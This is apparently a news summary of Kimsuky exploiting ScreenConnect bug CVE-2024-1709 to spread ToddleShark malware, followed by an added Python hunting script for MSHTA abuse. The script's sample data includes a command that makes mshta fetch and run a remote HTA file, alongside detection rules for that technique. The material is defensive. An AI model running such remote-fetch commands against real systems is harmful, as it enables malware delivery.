North Korea Hits ScreenConnect Bugs to Drop ‘ToddleShark’ Malware

March 5, 2024 at 03:02PM

North Korean hackers are exploiting a vulnerability in ConnectWise's ScreenConnect software to deliver the ToddleShark malware. Kimsuky, a DPRK-based APT, is targeting organizations through the CVE-2024-1709 bug. ToddleShark gathers system information and sends it to attacker-controlled servers over encrypted channels, and it evades detection through randomization and junk code. Organizations are urged to patch their systems promptly; more information is available on ConnectWise's website.

The key takeaways are:

1. North Korean hackers are exploiting a critical vulnerability (CVE-2024-1709) in ConnectWise’s ScreenConnect software to spread a new, shapeshifting espionage malware called ToddleShark.

2. Kimsuky (aka APT43), the North Korean advanced persistent threat (APT) group, uses ToddleShark to gather system information, evade detection through randomization algorithms, and execute via the legitimate Microsoft binary MSHTA.

3. Traditional detection methods such as blocklisting are not effective against ToddleShark, because its randomization algorithms give every sample a unique hash.

4. Organizations are urged to patch ScreenConnect applications immediately to prevent exploitation of the CVE-2024-1709 vulnerability. Additional resources for ConnectWise customers are available on the vendor’s website.
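Because per-sample randomization defeats hash blocklisting, a defender has to key on behaviour instead: here, MSHTA being launched in the context of ScreenConnect. The following is an added example, not code from the article or from ConnectWise; it scans constructed Sysmon-style process-creation records and flags mshta.exe spawned by a ScreenConnect client process or invoked with a remote URL. The ScreenConnect client path and the sample events are assumptions constructed for the example.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry).
# The ScreenConnect client path is an assumption about the default install layout.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Program Files (x86)\ScreenConnect Client (abc123)\ScreenConnect.WindowsClient.exe",
     "cmdline": r"mshta.exe http://203.0.113.10/index.hta"},   # constructed, TEST-NET address
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe C:\Users\alice\Documents\report.hta"},  # benign local HTA
    {"image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Program Files (x86)\ScreenConnect Client (abc123)\ScreenConnect.WindowsClient.exe",
     "cmdline": "notepad.exe"},                                       # not mshta, ignored
]


def classify(event):
    """Return the reasons a process-creation event looks like MSHTA abuse.

    Hash-independent: only the image name, parent process and command line
    are inspected, so a freshly randomized sample is caught just the same.
    """
    reasons = []
    image = event["image"].lower()
    parent = event["parent"].lower()
    cmdline = event["cmdline"]
    if not image.endswith("\\mshta.exe"):
        return reasons
    # mshta.exe started by the remote-access client is the post-exploitation pattern.
    if "screenconnect" in parent:
        reasons.append("mshta spawned by ScreenConnect process")
    # mshta.exe fetching its script from a remote URL is rarely legitimate.
    if re.search(r"\bhttps?://", cmdline, re.IGNORECASE):
        reasons.append("mshta invoked with a remote URL")
    return reasons


def hunt(events):
    """Return (command line, reasons) for every event that triggers at least one rule."""
    hits = []
    for event in events:
        reasons = classify(event)
        if reasons:
            hits.append((event["cmdline"], reasons))
    return hits


if __name__ == "__main__":
    for cmdline, reasons in hunt(SAMPLE_EVENTS):
        print(f"ALERT: {cmdline} -> {', '.join(reasons)}")
```

The same two checks map directly onto an EDR or SIEM rule on process-creation telemetry (parent image, image, command line), which is the layer where a hash-agnostic detection belongs.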

These takeaways highlight the urgent need for organizations to update and patch their ConnectWise applications to protect against the growing threat from ToddleShark and similar espionage activities.
